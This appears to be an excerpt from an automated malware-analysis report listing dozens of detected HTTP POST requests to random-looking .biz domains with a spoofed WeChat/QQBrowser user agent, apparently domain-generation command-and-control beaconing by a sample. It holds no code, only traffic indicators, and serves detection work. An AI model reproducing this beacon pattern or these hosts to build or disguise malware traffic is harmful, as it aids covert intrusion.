Source: global traffic HTTP traffic detected: POST /eupqxdgegqjrgdpv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /irvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xwcotmorefmmtc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /kgrfegimyutt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /rvwdmrjan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mbuec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /avc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qmpy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /blhkiobysomvisx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /aatpwqmmnwrfjm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hrkmkab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tkvpxcpexicoa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /bmgwtyy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ghffopumxhoiq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /bgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /fafj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /dadmwtnbmefxvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /wofnqkoxvbvigg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ccx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /nbnssijhjwmugla HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hpkejgwwxdp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /pnckkgdjorsjoiow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dhyyqtllpdwr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /btnkoeanfymxsstk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pgakntaoep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ihrtfcsj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ywao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hdfj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /udjkgjnyfcxmpggx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lhiqwpom HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /opshcknhcx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cmdgaowb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ijfjro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /dvsybtnikly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kqhlsuvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /emkvqhipcuidqkmd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mqrfuyvbhtbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /fqwxf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wxdopk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ifsivywgpp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /qlejchqklyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fvlqmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /jmyxny HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /fshqbiv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tipcpxgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /qkmbmbtlinurxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mhnfavogqkp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /omaxykiwlg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mggqfmrkiurp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /elpkfqto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /mvjuawquor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xqvmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /sltbypkjutmqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /risgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fvahgnbvglin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /xwmumuqawghep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /anxrplnvdvpxn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /iytkitpluk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /cngo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /uwugf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
